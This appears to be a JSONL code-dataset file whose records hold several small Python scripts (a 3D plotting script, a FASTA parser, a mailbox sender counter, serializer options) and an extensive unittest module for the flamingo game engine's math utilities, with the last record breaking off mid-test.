+{"seq_id":"550343691","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport pandas as pd\n\ndef disp_plot(result,box,num):\n ax.scatter(result[:,0],result[:,1],result[:,2],c='g')\n for i in range(box.shape[1]):\n j=box[num][i]\n ax.scatter(result[j,0],result[j,1],result[j,2],c='r')\n plt.show()\n\n#️⃣data=np.loadtxt(\"example_elipsoid_data.csv\",delimiter=\",\")\ndata=np.loadtxt(\"example_swithroll_data.csv\",delimiter=\",\")\nmin_box=np.loadtxt(\"min.csv\",delimiter=\",\")\n#data=np.loadtxt(\"example_2circles.csv\",delimiter=\",\")\n\nsplit_n=[i*0.1 for i in range(1,10,2)]\nindices=[int(data.shape[0]*n) for n in split_n]\nresult_1,result_2,result_3,result_4,result_5,result_6=np.split(data, indices)\ncolor_box=['b','g','r','c','m','y','k']\nfig = plt.figure()\nax = Axes3D(fig)\n\n#disp_plot(result_1,min_box,0)\n#disp_plot(result_2,min_box,1)\ndisp_plot(result_3,min_box,2)\n#disp_plot(result_4,min_box,3)\n#disp_plot(result_5,min_box,4)\n#disp_plot(result_6,min_box,5)\n","sub_path":"3D_show.py","file_name":"3D_show.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"595743885","text":"def readFastaMul(nomFi):\n\tf=open(nomFi,\"r\")\n\tlines=f.readlines()\n\tf.close()\n\tDiconom={}\n\tfor l in lines:\n\t\tif l[0] == '>':\n\t\t\tinfo=l.split(\"|\")\n\t\t\tDiconom[info[0][1:]]=[]\n\t\t\tDiconom[info[0][1:]].append(info[1])\n\t\t\tDiconom[info[0][1:]].append(info[2])\n\t\t\tDiconom[info[0][1:]].append(info[3])\n\treturn Diconom\n\t#return lesSeq\n\n\n\n\ndef readpartis(inputfile):\n\tDicoRep={}\n\tf=open(inputfile,\"r\")\n\tlignes=f.readlines()\n\tf.close()\n\tfor l in range(1,len(lignes)):\n\t\tsplit=lignes[l].split(\" \")\n\t\tDicoRep[split[2]]=[]\n\t\tDicoRep[split[2]].append(split[3])\n\t\tDicoRep[split[2]].append(split[4])\n\t\tDicoRep[split[2]].append(split[5])\n\treturn DicoRep\n\n\ndef writeoutput(Diconom,DicoRep):\n\toutput=open(\"outpartis80Sim.txt\",\"w\")\n\toutput.write(\"\\n\")\n\tfor key in Diconom.keys():\n\t\tRep='# '+Diconom[key][0]+' '+Diconom[key][1]+' '+Diconom[key][2]+'\\n'\n\t\toutput.write(Rep)\n\t\tRes='> '+DicoRep[key][0]+' '+DicoRep[key][1]+' '+DicoRep[key][2] +'\\n'\n\t\toutput.write(Res)\n\t\toutput.write(\"\\n\")\n\treturn 0\n\nDiconom=readFastaMul(\"simple_plus_indels_10000_80.fa\")\nDicoRep=readpartis(\"out80.txt\")\nwriteoutput(Diconom,DicoRep)\n","sub_path":"code/simulated/partis/resultbasedonD.py","file_name":"resultbasedonD.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"255020240","text":"f = open('mbox-short.txt')\nd = dict()\nm = 0\nfor line in f:\n line = line.rstrip()\n l = line.split()\n if len(l) <= 1 or l[0] != 'From' : continue\n d[l[1]] = d.get(l[1],0) + 1\n if d[l[1]] > m :\n m = d[l[1]]\n p = l[1]\nprint(p,m)\n","sub_path":"c2w5/c2w5p1.py","file_name":"c2w5p1.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"539556491","text":"# -*- coding: utf-8 -*-\n\nfrom aserializer.utils.parsers import Parser\n\n\n\nclass MetaOptions(object):\n\n def __init__(self, meta):\n self.fields = getattr(meta, 'fields', [])\n self.exclude = getattr(meta, 'exclude', [])\n\n\nclass SerializerMetaOptions(MetaOptions):\n\n def __init__(self, meta):\n super(SerializerMetaOptions, self).__init__(meta)\n self.parser = getattr(meta, 'parser', Parser)\n\n\nclass CollectionMetaOptions(MetaOptions):\n\n def __init__(self, meta):\n super(CollectionMetaOptions, self).__init__(meta)\n self.serializer = getattr(meta, 'serializer', None)\n self.with_metadata = getattr(meta, 'with_metadata', True)\n self.metadata_key = getattr(meta, 'metadata_key', '_metadata')\n self.items_key = getattr(meta, 'items_key', 'items')\n self.offset_key = getattr(meta, 'offset_key', 'offset')\n self.limit_key = getattr(meta, 'limit_key', 'limit')\n self.total_count_key = getattr(meta, 'total_count_key', 'totalCount')\n self.sort = getattr(meta, 'sort', [])\n self.validation = getattr(meta, 'validation', False)\n","sub_path":"aserializer/utils/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"570463362","text":"# Test Suite \n\nimport unittest\nfrom test_graph import TestGraph\nfrom github_service_test import TestGithubService\n\n\ntest_classes_to_run = [TestGraph, TestGithubService, TestDiff]\n\nloader = unittest.TestLoader()\n\nsuites_list = []\nfor test_class in test_classes_to_run:\n suite = loader.loadTestsFromTestCase(test_class)\n suites_list.append(suite)\n\nbig_suite = unittest.TestSuite(suites_list)\n\nrunner = unittest.TextTestRunner()\nresults = runner.run(big_suite)\n\n#suite = unittest.TestLoader().loadTestsFromTestCase().loadTestsFromTestCase()\n#unittest.TextTestRunner(verbosity=2).run(suite)","sub_path":"test_suite.py","file_name":"test_suite.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"400273987","text":"#!/usr/bin/env python\r\n\r\n## flamingo - 2D Game Engine\r\n## Copyright (C) 2009 Bradley Zeis\r\n##\r\n## This program is free software: you can redistribute it and/or modify\r\n## it under the terms of the GNU General Public License as published by\r\n## the Free Software Foundation, either version 3 of the License, or\r\n## (at your option) any later version.\r\n##\r\n## This program is distributed in the hope that it will be useful,\r\n## but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n## GNU General Public License for more details.\r\n##\r\n## You should have received a copy of the GNU General Public License\r\n## along with this program. If not, see .\r\n##\r\n## Bradley Zeis\r\n## flamingoengine@gmail.com\r\n\r\n\"\"\"Unit Tests for flamingo.flmath\"\"\"\r\n\r\nimport unittest\r\nimport flamingo\r\nimport math\r\nimport pickle\r\nfrom numbers import Number\r\n\r\nclass TestPow(unittest.TestCase):\r\n def setUp(self):\r\n self.data = [2, 3, 4, 7, 17, 710, 483, 60495, 712345]\r\n self.bad = [\"hello world!\", [1, 2, 3], {'foo': 'bar'},\r\n flamingo.flmath.Vector([1, 1])]\r\n\r\n def testClosestIsNumber(self):\r\n for d in self.data:\r\n self.assertTrue(isinstance(flamingo.flmath.closest_pow2(d), Number))\r\n\r\n def testClosestIsPow2(self):\r\n for d in self.data:\r\n result = flamingo.flmath.closest_pow2(d)\r\n self.assertEqual(math.log(result, 2) % 1, 0.0)\r\n\r\n def testClosestIsOne(self):\r\n for d in self.data:\r\n self.assertTrue(flamingo.flmath.closest_pow2(d) >= 1)\r\n\r\n def testClosestIsClosest(self):\r\n for d in self.data:\r\n less = math.pow(2, math.ceil(math.log(d)/math.log(2.0)))\r\n greater = math.pow(2, math.floor(math.log(d)/math.log(2.0)))\r\n lessd = d - less\r\n greaterd = greater - d\r\n\r\n if lessd < greaterd:\r\n self.assertEqual(flamingo.flmath.closest_pow2(d), greater)\r\n else:\r\n self.assertEqual(flamingo.flmath.closest_pow2(d), less)\r\n\r\n def testClosestBad(self):\r\n for b in self.bad:\r\n self.assertRaises(TypeError,\r\n flamingo.flmath.closest_pow2, b)\r\n\r\n def testClosestNeg(self):\r\n for d in self.data:\r\n self.assertRaises(ValueError, flamingo.flmath.closest_pow2, -d)\r\n\r\n def testNextIsNumber(self):\r\n for d in self.data:\r\n self.assertTrue(isinstance(flamingo.flmath.next_pow2(d), Number))\r\n\r\n def testNextIsPow2(self):\r\n for d in self.data:\r\n result = flamingo.flmath.next_pow2(d)\r\n self.assertEqual(math.log(result, 2) % 1, 0.0)\r\n\r\n def testNextIsOne(self):\r\n for d in self.data:\r\n self.assertTrue(flamingo.flmath.next_pow2(d) >= 1)\r\n\r\n def testNextGreater(self):\r\n for d in self.data:\r\n result = flamingo.flmath.next_pow2(d)\r\n self.assertTrue(result >= d)\r\n\r\n def testNextBad(self):\r\n for b in self.bad:\r\n self.assertRaises(TypeError, flamingo.flmath.next_pow2, b)\r\n\r\n def testNextNeg(self):\r\n for d in self.data:\r\n self.assertRaises(ValueError, flamingo.flmath.next_pow2, -d)\r\n\r\n def testPrevIsNumber(self):\r\n for d in self.data:\r\n self.assertTrue(isinstance(flamingo.flmath.prev_pow2(d), Number))\r\n\r\n def testPrevIsPow2(self):\r\n for d in self.data:\r\n result = flamingo.flmath.prev_pow2(d)\r\n self.assertEqual(math.log(result, 2) % 1, 0.0)\r\n\r\n def testPrevIsOne(self):\r\n for d in self.data:\r\n self.assertTrue(flamingo.flmath.prev_pow2(d) >= 1)\r\n\r\n def testPrevLess(self):\r\n for d in self.data:\r\n result = flamingo.flmath.prev_pow2(d)\r\n if result is 
None:\r\n self.assertTrue(False)\r\n self.assertTrue(result <= d)\r\n\r\n def testPrevBad(self):\r\n for b in self.bad:\r\n self.assertRaises(TypeError, flamingo.flmath.prev_pow2, b)\r\n\r\n def testPrevNeg(self):\r\n for d in self.data:\r\n self.assertRaises(ValueError, flamingo.flmath.prev_pow2, -d)\r\n\r\n\r\nclass TestDistance(unittest.TestCase):\r\n def setUp(self):\r\n ## data = [[point, point, distance, distance_sq]]\r\n self.data = [[(0, 0), (0, 1), 1, 1],\r\n [(2.5, 2),(4.76, 3.1), 2.5134, 6.3176],\r\n [(10, 16),(100, 160), 169.8116, 28836],\r\n [flamingo.flmath.Vector([1.2, 1]), flamingo.flmath.Vector([16, 1]), 14.8, 219.04],\r\n [(0, 0), (0, 0), 0, 0],\r\n [flamingo.flmath.Vector([0, 0]), flamingo.flmath.Vector([0, 0]), 0, 0]]\r\n\r\n self.long = [[(21, 4, 6, 4, 3), (14, 16, 71, 723, 5)],\r\n [(10, 9, 8, 7, 6, 5, 4, 3, 2, 1), (1, 2, 3, 4, 5, 6, 7, 8, 9, 10)],\r\n [(1, 2, 3, 4), (5, 4, 3, 2, 1)]]\r\n\r\n self.short = [[(), ()]]\r\n\r\n self.bad = [[\"hello\", \"world\"],\r\n [{'foo': 'bar'}, {'bar': 'foo'}],\r\n [\"hello world\", 35]]\r\n\r\n def testIsNumber(self):\r\n for d in self.data:\r\n self.assertTrue(isinstance(flamingo.flmath.distance(d[0], d[1]), Number))\r\n\r\n def testIsPos(self):\r\n for d in self.data:\r\n self.assertTrue(flamingo.flmath.distance(d[0], d[1]) >= 0)\r\n\r\n def testValue(self):\r\n for d in self.data:\r\n result = flamingo.flmath.distance(d[0], d[1])\r\n self.assertEqual(round(result, 2), round(d[2], 2))\r\n\r\n def testBad(self):\r\n for b in self.bad:\r\n self.assertRaises(TypeError, flamingo.flmath.distance, b[0],b[1])\r\n\r\n ##-------- Sq\r\n def testIsNumberSq(self):\r\n for d in self.data:\r\n self.assertTrue(isinstance(flamingo.flmath.distance_sq(d[0], d[1]), Number))\r\n\r\n def testIsPosSq(self):\r\n for d in self.data:\r\n self.assertTrue(flamingo.flmath.distance_sq(d[0], d[1]) >= 0)\r\n\r\n def testValueSq(self):\r\n for d in self.data:\r\n result = flamingo.flmath.distance_sq(d[0], d[1])\r\n self.assertEqual(round(result, 2), round(d[3], 2))\r\n\r\n def testBadSq(self):\r\n for b in self.bad:\r\n self.assertRaises(TypeError, flamingo.flmath.distance_sq, b[0],b[1])\r\n\r\n\r\nclass TestMidpoint(unittest.TestCase):\r\n def setUp(self):\r\n ## data = [[point, point, midpoint]]\r\n self.data = [[(0, 0), (0, 1), (0, 0.5)],\r\n [(2.5, 2),(4.76, 3.1), (3.63, 2.55)],\r\n [(10, 16),(100, 160), (55, 88)],\r\n [flamingo.flmath.Vector([1.13, 1]), (16, 1), (8.565, 1)],\r\n [(0, 0), (0, 0), (0, 0)]]\r\n\r\n self.wrong = [[(), ()],\r\n [(2,), (1,)]]\r\n\r\n self.bad = [[\"hello\", \"world\"],\r\n [{'foo': 'bar'}, {'bar': 'foo'}],\r\n [\"hello world\", 35]]\r\n\r\n def testValue(self):\r\n for d in self.data:\r\n result = flamingo.flmath.midpoint(d[0], d[1])\r\n self.assertEqual(round(result[0]), round(d[2][0]))\r\n self.assertEqual(round(result[1]), round(d[2][1]))\r\n\r\n def testWrong(self):\r\n for d in self.wrong:\r\n self.assertRaises(TypeError, flamingo.flmath.midpoint, d[0], d[1])\r\n\r\n def testBad(self):\r\n for b in self.bad:\r\n self.assertRaises(TypeError, flamingo.flmath.midpoint, b[0],b[1])\r\n\r\n\r\nclass TestArea(unittest.TestCase):\r\n def setUp(self):\r\n ## [[data], area, signed_area]\r\n self.data = [[ [(1, 1), (-1, 1), (-1, -1), (1, -1)], 4, 4],\r\n [ [(1, 1), (1, -1), (-1, -1), (-1, 1)], 4, -4],\r\n [ [(0, 15.4), (-64.24, -10.1), (14.4, -10.1)], 1002.66, 1002.66 ],\r\n [ [(0, 15.4), (14.4, -10.1), (-64.24, -10.1)], 1002.66, -1002.66 ]]\r\n\r\n self.odata = [[ [(1, 1), (-1, 1), (-1, -1), (1, -1)], True],\r\n [ [(1, 1), (1, -1), 
(-1, -1), (-1, 1)], False],\r\n [ [(0, 15.4), (-64.24, -10.1), (14.4, -10.1)], True],\r\n [ [(0, 15.4), (14.4, -10.1), (-64.24, -10.1)], False]]\r\n\r\n self.bad = [[\"meow\", \"rawrf\", \"ROAR\"],\r\n [(\"meow\", \"woof\"), (\"woof\", \"meow\"), (\"rawr\", \"roar\")],\r\n [{'foo': 'bar'}, {'foo': 'bar'}, {'foo': 'bar'}],\r\n [(1,), (2,), (3,)],\r\n [(1, 2), (3, 4)],\r\n [(1, 2)],\r\n []]\r\n\r\n ##-------- Pos Area\r\n def testIsNumber(self):\r\n for d in self.data:\r\n self.assertTrue(isinstance(flamingo.flmath.area(d[0]), Number))\r\n\r\n def testIsPos(self):\r\n for d in self.data:\r\n self.assertTrue(flamingo.flmath.area(d[0]) > 0)\r\n\r\n def testValue(self):\r\n for d in self.data:\r\n result = flamingo.flmath.area(d[0])\r\n self.assertEqual(round(result, 2), round(d[1], 2))\r\n\r\n def testBad(self):\r\n for b in self.bad:\r\n self.assertRaises(TypeError, flamingo.flmath.area, b)\r\n\r\n ##-------- Signed Area\r\n def testIsNumberS(self):\r\n for d in self.data:\r\n self.assertTrue(isinstance(flamingo.flmath.signed_area(d[0]), Number))\r\n\r\n def testValueS(self):\r\n for d in self.data:\r\n result = flamingo.flmath.signed_area(d[0])\r\n self.assertEqual(round(result, 2), round(d[2], 2))\r\n\r\n def testBadS(self):\r\n for b in self.bad:\r\n self.assertRaises(TypeError, flamingo.flmath.signed_area, b)\r\n\r\n ##-------- Orientation\r\n def testValueO(self):\r\n for d in self.odata:\r\n result = flamingo.flmath.orientation_poly(d[0])\r\n self.assertEqual(result, d[1])\r\n\r\n def testBadO(self):\r\n for b in self.bad:\r\n self.assertRaises(TypeError, flamingo.flmath.orientation_poly, b)\r\n\r\n\r\nclass TestNormalizeAngle(unittest.TestCase):\r\n def setUp(self):\r\n self.datad = [[45, 45],\r\n [360, 0],\r\n [400, 40],\r\n [4000, 40],\r\n [-100, 260]]\r\n self.datar = [[math.radians(45), math.radians(45)],\r\n [math.radians(360), math.radians(0)],\r\n [math.radians(400), math.radians(40)],\r\n [math.radians(4000), math.radians(40)],\r\n [math.radians(-100), math.radians(260)]]\r\n self.bad = [\"meow\",\r\n [16],\r\n {'foo': 'bar'}]\r\n\r\n ##-------- Degress\r\n def testNumber(self):\r\n for i in range(0, 1000):\r\n self.assertTrue(isinstance(flamingo.flmath.normalize_angle(i), Number))\r\n\r\n def testIsPos(self):\r\n for i in range(0, 1000):\r\n self.assertTrue(flamingo.flmath.normalize_angle(i) >= 0)\r\n\r\n def testValue(self):\r\n for d in self.datad:\r\n self.assertEqual(flamingo.flmath.normalize_angle(d[0]), d[1])\r\n\r\n def testBad(self):\r\n for b in self.bad:\r\n self.assertRaises(TypeError, flamingo.flmath.normalize_angle, b)\r\n\r\n ##-------- Radians\r\n def testNumberR(self):\r\n for i in range(0, 1000):\r\n self.assertTrue(isinstance(flamingo.flmath.normalize_angler(i), Number))\r\n\r\n def testIsPosR(self):\r\n for i in range(0, 1000):\r\n self.assertTrue(flamingo.flmath.normalize_angler(i) >= 0)\r\n\r\n def testValueR(self):\r\n for d in self.datar:\r\n self.assertAlmostEqual(flamingo.flmath.normalize_angler(d[0]), d[1])\r\n\r\n def testBadR(self):\r\n for b in self.bad:\r\n self.assertRaises(TypeError, flamingo.flmath.normalize_angler, b)\r\n\r\n\r\nclass TestNormalizePoly(unittest.TestCase):\r\n def setUp(self):\r\n self.p = [flamingo.flmath.Vector((-1,1)), (-1,-1), [1,-1], (1,1)]\r\n\r\n self.bad = [[1, 2, 3],\r\n [{'foo': 'bar'}, \"meow!\", (1, 2), [\"3\",\"4\"]],\r\n [(1,), (2,), (3,)]]\r\n\r\n def testNormalize(self):\r\n self.assertEqual(flamingo.flmath.normalize_poly(self.p), self.p)\r\n p = [flamingo.flmath.Vector((-1,1)), (-1,-1), [1,-1], (1,1), (-1, 
1)]\r\n self.assertEqual(flamingo.flmath.normalize_poly(p), self.p)\r\n self.assertEqual(flamingo.flmath.normalize_poly(self.p, 1), p)\r\n\r\n p = [(-1,1), (-1,-1), [1,-1], (1,1), (-1, 1), (-1,-1)]\r\n self.assertEqual(flamingo.flmath.normalize_poly(p), self.p)\r\n self.assertEqual(flamingo.flmath.normalize_poly(self.p, 2), p)\r\n\r\n def testBad(self):\r\n for b in self.bad:\r\n self.assertRaises(TypeError, flamingo.flmath.normalize_poly, b)\r\n\r\n\r\nclass TestPolySimplify(unittest.TestCase):\r\n def setUp(self):\r\n self.data = [[(1, 0), (1, 8.12), (19.95, 5), (-1, -5), (-1.25, -5.15)],\r\n [[-1, 0], [-1, -4.12], [-16.95, -5], [14, 5], [1.25, 5.15]]]\r\n\r\n self.bad = [[\"meow\", \"rawrf\", \"ROAR\"],\r\n [(\"meow\", \"woof\"), (\"woof\", \"meow\"), (\"rawr\", \"roar\")],\r\n [{'foo': 'bar'}, {'foo': 'bar'}, {'foo': 'bar'}]]\r\n\r\n def testReturnsList(self):\r\n for i in range(8):\r\n for d in self.data:\r\n self.assertTrue(isinstance(flamingo.flmath.simplify_poly(d, i), list))\r\n\r\n def testReturnsCoords(self):\r\n for i in range(8):\r\n for d in self.data:\r\n result = flamingo.flmath.simplify_poly(d, i)\r\n b = True\r\n\r\n for p in result:\r\n if not (isinstance(p[0], Number) and isinstance(p[1], Number)):\r\n b = b and False\r\n break\r\n\r\n self.assertTrue(b)\r\n\r\n def testBad(self):\r\n for b in self.bad:\r\n self.assertRaises(TypeError, flamingo.flmath.simplify_poly, b, 1)\r\n\r\nclass TestVector(unittest.TestCase):\r\n def setUp(self):\r\n self.v = flamingo.flmath.Vector((111, 222))\r\n\r\n self.bad = [(8, {'foo': 'bar'}),\r\n (\"meow!\", \"imah vector!\")]\r\n\r\n def testAccess(self):\r\n v = self.v.copy()\r\n self.assertEqual(v.x, 111)\r\n self.assertEqual(v.y, 222)\r\n v.x = 333\r\n v[1] = 444\r\n self.assertEqual(v[0], 333)\r\n self.assertEqual(v[1], 444)\r\n\r\n def testMath(self):\r\n v = self.v.copy()\r\n self.assertEqual(v + 1, flamingo.flmath.Vector((112, 223)))\r\n self.assertEqual(v - 2, [109,220])\r\n self.assertEqual(v * 3, (333,666))\r\n self.assertEqual(v / 2.0, flamingo.flmath.Vector((55.5, 111)))\r\n self.assertEqual(v / 2, (55.5, 111))\r\n self.assertEqual(v ** flamingo.flmath.Vector((2,3)), [12321, 10941048])\r\n self.assertEqual(v + [-11, 78], flamingo.flmath.Vector((100, 300)))\r\n\r\n def testReverseMath(self):\r\n v = self.v.copy()\r\n self.assertEqual(1 + v, flamingo.flmath.Vector((112,223)))\r\n self.assertEqual(2 - v, [-109,-220])\r\n self.assertEqual(3 * v, (333,666))\r\n self.assertEqual([111,222] ** flamingo.flmath.Vector((2,3)), [12321, 10941048])\r\n self.assertEqual(v + flamingo.flmath.Vector((1,1)), [112, 223])\r\n\r\n def testInplaceMath(self):\r\n inplace_vec = flamingo.flmath.Vector((5, 13))\r\n inplace_src = flamingo.flmath.Vector((inplace_vec))\r\n inplace_vec *= .5\r\n inplace_vec += .5\r\n inplace_vec /= 3\r\n inplace_vec += flamingo.flmath.Vector((-1, -1))\r\n alternate = (inplace_src*.5 + .5)/3 + [-1, -1]\r\n self.assertEqual(inplace_vec, alternate)\r\n\r\n def testUnary(self):\r\n v = self.v.copy()\r\n v = -v\r\n self.assertEqual(v, [-111,-222])\r\n v = abs(v)\r\n self.assertEqual(v, [111,222])\r\n\r\n def testLength(self):\r\n v = flamingo.flmath.Vector((3, 4))\r\n self.assertEqual(v.length, 5)\r\n v.length = 10\r\n self.assertEqual(v, [6, 8])\r\n\r\n\r\n def testAngles(self):\r\n v = flamingo.flmath.Vector((0,3))\r\n self.assertEqual(v.angle, 90)\r\n v.angle = 0\r\n self.assertEqual(v, (3, 0))\r\n v2 = (-3,0)\r\n self.assertEqual(v.angle_about(v2), 0)\r\n v2 = flamingo.flmath.Vector(v2)\r\n 
self.assertEqual(v2.angle_about(v), 180)\r\n        v.angle = 90, (0,0)\r\n        self.assertEqual(v, [0, 3])\r\n\r\n    def testComparison(self):\r\n        int_vec = flamingo.flmath.Vector((3, -2))\r\n        flt_vec = flamingo.flmath.Vector((3.0, -2.0))\r\n        zero_vec = flamingo.flmath.Vector((0, 0))\r\n        self.assertEqual(int_vec, flt_vec)\r\n        self.assertNotEqual(int_vec, zero_vec)\r\n        self.assertFalse(flt_vec == zero_vec)\r\n        self.assertFalse(flt_vec != int_vec)\r\n        self.assertEqual(int_vec, (3, -2))\r\n        self.assertNotEqual(int_vec, [0, 0])\r\n        self.assertNotEqual(int_vec, 5)\r\n\r\n    def testConversion(self):\r\n        self.assertEqual(list(self.v), [111, 222])\r\n        self.assertTrue(isinstance(list(self.v), list))\r\n        self.assertEqual(tuple(self.v), (111, 222))\r\n        self.assertTrue(isinstance(tuple(self.v), tuple))\r\n\r\n    def testPickle(self):\r\n        testvec = flamingo.flmath.Vector((5, .3))\r\n        testvec_str = pickle.dumps(testvec)\r\n        loaded_vec = pickle.loads(testvec_str)\r\n        self.assertEqual(testvec, loaded_vec)\r\n\r\n    def testBad(self):\r\n        for b in self.bad:\r\n            self.assertRaises(TypeError, flamingo.flmath.Vector, b)\r\n\r\n\r\nclass TestPolygon(unittest.TestCase):\r\n    def setUp(self):\r\n        self.p = flamingo.flmath.Polygon([(-1,1), (-1,-1), (1,-1), (1,1)])\r\n\r\n        self.bad = [[{'foo': 'bar'}, \"meow!\", (1, 2), [\"3\",\"4\"]]]\r\n\r\n    def testAccess(self):\r\n        p = self.p.copy()\r\n        self.assertEqual(p[0], (-1, 1))\r\n        p[0] = (-5, 5)\r\n        self.assertEqual(p[0], (-5, 5))\r\n        self.assertTrue(isinstance(p[0], flamingo.flmath.Vector))\r\n        self.assertEqual(p.center, (-1, 1))\r\n        p[1] = -4, 7\r\n        self.assertEqual(p[1], (-4, 7))\r\n        p[3] = 16\r\n        self.assertEqual(p[3], (16, 16))\r\n\r\n    def testComparison(self):\r\n        p = self.p.copy()\r\n        self.assertEqual(p, [(-1,1), (-1,-1), (1,-1), (1,1)])\r\n        q = flamingo.flmath.Polygon([(-1,1), (-1,-1), (1,-1), (1,1)])\r\n        self.assertEqual(p, q)\r\n        q[0] = -5, 5\r\n        self.assertNotEqual(p, q)\r\n        self.assertNotEqual(q, p)\r\n\r\n    def testAppend(self):\r\n        p = self.p.copy()\r\n        self.assertRaises(AttributeError, flamingo.flmath.Polygon.append, p, (0, 2.5))\r\n\r\n        p.enable(flamingo.constants.POLYGON_MUTABLE_LENGTH)\r\n        p.append((0, 2.5))\r\n        self.assertEqual(len(p), 5)\r\n        self.assertEqual(p.center, (0, 0.5))\r\n        p[4] -= 0, 1\r\n        self.assertEqual(p.center, (0,0))\r\n        p.append((-0.5, 1))\r\n        self.assertEqual(len(p), 6)\r\n        self.assertEqual(p.center, (0,0))\r\n\r\n    def testInsert(self):\r\n        p = self.p.copy()\r\n        self.assertRaises(AttributeError, flamingo.flmath.Polygon.insert, p, 1, (-2.5, 0))\r\n\r\n        p.enable(flamingo.constants.POLYGON_MUTABLE_LENGTH)\r\n        p.insert(1, (-2.5, 0))\r\n        self.assertEqual(len(p), 5)\r\n        self.assertEqual(p.center, (-0.5, 0))\r\n\r\n    def testRemove(self):\r\n        p = self.p.copy()\r\n        self.assertRaises(AttributeError, flamingo.flmath.Polygon.remove, p, 3)\r\n\r\n        p.enable(flamingo.constants.POLYGON_MUTABLE_LENGTH)\r\n        p.remove(3)\r\n        self.assertEqual(len(p), 3)\r\n        self.assertEqual(p.center, -1.0/3)\r\n        self.assertRaises(TypeError, flamingo.flmath.Polygon.remove, p, 1)\r\n\r\n    def testConversion(self):\r\n        p = self.p.copy()\r\n        self.assertEqual(list(p), p)\r\n        self.assertTrue(isinstance(list(p), list))\r\n        self.assertEqual(tuple(p), p)\r\n        self.assertTrue(isinstance(tuple(p), tuple))\r\n\r\n    def testAngle(self):\r\n        p = self.p.copy()\r\n        self.assertEqual(p.angle, 0)\r\n        p.center = 1,0\r\n        self.assertEqual(p.angle, 0)\r\n        p.center = 0, 10\r\n        self.assertEqual(p.angle, 90)\r\n\r\n    def testOrientation(self):\r\n        p = self.p.copy()\r\n        self.assertEqual(p.orientation, 0)\r\n        l = list(p)\r\n        p.orientation 
= 90\r\n self.assertNotEqual(p, l)\r\n self.assertAlmostEqual(p[0].x, -1, 0.001)\r\n self.assertAlmostEqual(p[0].y, -1, 0.001)\r\n self.assertAlmostEqual(p[1].x, 1, 0.001)\r\n self.assertAlmostEqual(p[1].y, -1, 0.001)\r\n self.assertAlmostEqual(p[2].x, 1, 0.001)\r\n self.assertAlmostEqual(p[2].y, 1, 0.001)\r\n self.assertAlmostEqual(p[3].x, -1, 0.001)\r\n self.assertAlmostEqual(p[3].y, 1, 0.001)\r\n\r\n def testCollision(self):\r\n p1 = self.p.copy()\r\n p2 = [(-0.5,0.5), (-0.5,-0.5), (0.5,-0.5), (0.5,0.5)]\r\n self.assertTrue(p1.intersects(p2))\r\n self.assertTrue(p1.intersects(p1))\r\n p1.center = 90, -60\r\n self.assertFalse(p1.intersects(p2))\r\n p1.center = 1.5, 0\r\n self.assertTrue(p1.intersects(p2))\r\n p1.center = 0, -1.5\r\n self.assertTrue(p1.intersects(p2))\r\n p1.center = -1.4, 0\r\n self.assertTrue(p1.intersects(p2))\r\n\r\n def testPickle(self):\r\n testpoly = flamingo.flmath.Polygon([(-1,1), (-1,-1), (1,-1), (1,1)])\r\n testpoly_str = pickle.dumps(testpoly)\r\n loaded_poly = pickle.loads(testpoly_str)\r\n self.assertEqual(testpoly, loaded_poly)\r\n\r\n def testBad(self):\r\n for b in self.bad:\r\n self.assertRaises(TypeError, flamingo.flmath.Polygon, b)\r\n\r\n\r\nclass TestRect(unittest.TestCase):\r\n def setUp(self):\r\n self.p = flamingo.flmath.Rect((0, 0), 2, 2)\r\n\r\n self.bad = [[1, 2, 3],\r\n [{'foo': 'bar'}, \"meow!\", (1, 2), [\"3\",\"4\"]],\r\n [(1,), (2,), (3,)]]\r\n\r\n def testAccess(self):\r\n p = self.p.copy()\r\n self.assertEqual(p.center, (0,0))\r\n self.assertEqual(p.topleft, (-1, 1))\r\n self.assertEqual(p.bottomleft, (-1, -1))\r\n p.center = 1, 3\r\n self.assertEqual(p.center, (1, 3))\r\n p.topright = 4\r\n self.assertEqual(p.topright, (4, 4))\r\n self.assertEqual(p.bottomright, (4, 2))\r\n p[1] = 4, 1\r\n self.assertEqual(p.topright, (4, 3))\r\n self.assertEqual(p.bottomright, (4, 1))\r\n p.width = 4\r\n self.assertEqual(p.topright, (5, 3))\r\n p.size = (1, 1)\r\n self.assertEqual(p.topleft, (2.5, 2.5))\r\n\r\n def testComparison(self):\r\n p = self.p.copy()\r\n q = [(-1, -1), (1, -1), (1, 1), (-1, 1)]\r\n self.assertEqual(p, q)\r\n q[3] = (-1, 2)\r\n self.assertNotEqual(p, q)\r\n\r\n def testAppend(self):\r\n p = self.p.copy()\r\n self.assertRaises(TypeError, flamingo.flmath.Rect.append, p, (0,0))\r\n\r\n def testInsert(self):\r\n p = self.p.copy()\r\n self.assertRaises(TypeError, flamingo.flmath.Rect.insert, p, 1, (0,0))\r\n\r\n def testRemove(self):\r\n p = self.p.copy()\r\n self.assertRaises(TypeError, flamingo.flmath.Rect.remove, p, 1)\r\n\r\n def testAngle(self):\r\n p = self.p.copy()\r\n self.assertEqual(p.angle, 0)\r\n p.center = 1,0\r\n self.assertEqual(p.angle, 0)\r\n p.center = 0, 10\r\n self.assertEqual(p.angle, 90)\r\n p.angle = 0\r\n self.assertEqual(p.center, (10, 0))\r\n\r\n def testOrientation(self):\r\n p = self.p.copy()\r\n self.assertEqual(p.orientation, 0)\r\n l = list(p)\r\n p.orientation = 90\r\n self.assertNotEqual(p, l)\r\n self.assertAlmostEqual(p[0].x, 1, 0.001)\r\n self.assertAlmostEqual(p[0].y, -1, 0.001)\r\n self.assertAlmostEqual(p[1].x, 1, 0.001)\r\n self.assertAlmostEqual(p[1].y, 1, 